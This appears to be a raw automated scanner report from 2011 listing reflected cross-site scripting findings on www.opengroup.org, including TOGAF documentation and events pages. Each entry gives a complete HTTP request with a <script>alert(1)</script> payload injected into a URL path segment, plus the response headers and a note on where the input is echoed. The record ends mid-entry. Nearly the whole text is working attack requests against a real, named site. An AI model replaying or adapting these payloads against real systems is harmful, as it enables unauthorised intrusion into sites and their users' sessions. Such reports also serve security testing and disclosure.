GET /architecture/togaf8-doca7e1c<script>alert(1)</script>1741215fdf5/arch/toc2.html HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:50 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5240
The value of REST URL parameter 2 is copied into an HTML comment. The payload 9e1f5--><script>alert(1)</script>b71016c3570 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc9e1f5--><script>alert(1)</script>b71016c3570/arch/toc2.html HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:55 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5249
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21311"><script>alert(1)</script>f9f7ddebf6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc21311"><script>alert(1)</script>f9f7ddebf6/arch/toc2.html HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:42 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5243
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9a39f<script>alert(1)</script>f8f8cdf717 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc/arch9a39f<script>alert(1)</script>f8f8cdf717/toc2.html HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:07 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5237
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7288b"><script>alert(1)</script>23296fabe27 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc/arch7288b"><script>alert(1)</script>23296fabe27/toc2.html HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:05 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5246
The value of REST URL parameter 3 is copied into an HTML comment. The payload c8177--><script>alert(1)</script>3a4b97807fc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc/archc8177--><script>alert(1)</script>3a4b97807fc/toc2.html HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:09 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5249
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c201c<script>alert(1)</script>1e4c0cf0ddd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc/arch/toc2.htmlc201c<script>alert(1)</script>1e4c0cf0ddd HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:19 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5240
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d10a"><script>alert(1)</script>69f209beaf5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc/arch/toc2.html3d10a"><script>alert(1)</script>69f209beaf5 HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:17 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5246
The value of REST URL parameter 4 is copied into an HTML comment. The payload 45f60--><script>alert(1)</script>50e39303b85 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc/arch/toc2.html45f60--><script>alert(1)</script>50e39303b85 HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:22 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5249
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a706<script>alert(1)</script>4139a5bd8a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture8a706<script>alert(1)</script>4139a5bd8a2/togaf8-doc/arch/welcome.html HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:01 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5249
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1879c"><script>alert(1)</script>f5899df6f60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture1879c"><script>alert(1)</script>f5899df6f60/togaf8-doc/arch/welcome.html HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:59 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5255
The value of REST URL parameter 1 is copied into an HTML comment. The payload 7c3a5--><script>alert(1)</script>63e2aa5d122 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture7c3a5--><script>alert(1)</script>63e2aa5d122/togaf8-doc/arch/welcome.html HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:04 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5258
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 900bf"><script>alert(1)</script>c420b677f70 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc900bf"><script>alert(1)</script>c420b677f70/arch/welcome.html HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:13 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5255
The value of REST URL parameter 2 is copied into an HTML comment. The payload f63af--><script>alert(1)</script>21768ec9add was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-docf63af--><script>alert(1)</script>21768ec9add/arch/welcome.html HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:19 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5258
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9ae1c<script>alert(1)</script>3bd409f1f54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc9ae1c<script>alert(1)</script>3bd409f1f54/arch/welcome.html HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:16 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5249
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 527ca<script>alert(1)</script>e5d8b004316 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc/arch527ca<script>alert(1)</script>e5d8b004316/welcome.html HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:25 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5249
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c280c"><script>alert(1)</script>38d7c8bfaea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc/archc280c"><script>alert(1)</script>38d7c8bfaea/welcome.html HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:24 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5255
The value of REST URL parameter 3 is copied into an HTML comment. The payload f2eb2--><script>alert(1)</script>ee53edf7a8a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc/archf2eb2--><script>alert(1)</script>ee53edf7a8a/welcome.html HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:27 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5258
The value of REST URL parameter 4 is copied into an HTML comment. The payload edccf--><script>alert(1)</script>e2b2ebfe22e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc/arch/welcome.htmledccf--><script>alert(1)</script>e2b2ebfe22e HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:37 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5258
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4cc01<script>alert(1)</script>f89e7409842 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc/arch/welcome.html4cc01<script>alert(1)</script>f89e7409842 HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:33 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5249
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d70d"><script>alert(1)</script>bb423776bcc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /architecture/togaf8-doc/arch/welcome.html1d70d"><script>alert(1)</script>bb423776bcc HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:32 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5255
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78a8a<script>alert(1)</script>749c6a7fac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /events78a8a<script>alert(1)</script>749c6a7fac/sponsor-exhibit.htm HTTP/1.1 Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.3.10.1298915328
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:51:07 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5143
The value of REST URL parameter 1 is copied into an HTML comment. The payload 1cf72--><script>alert(1)</script>d544780bb6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
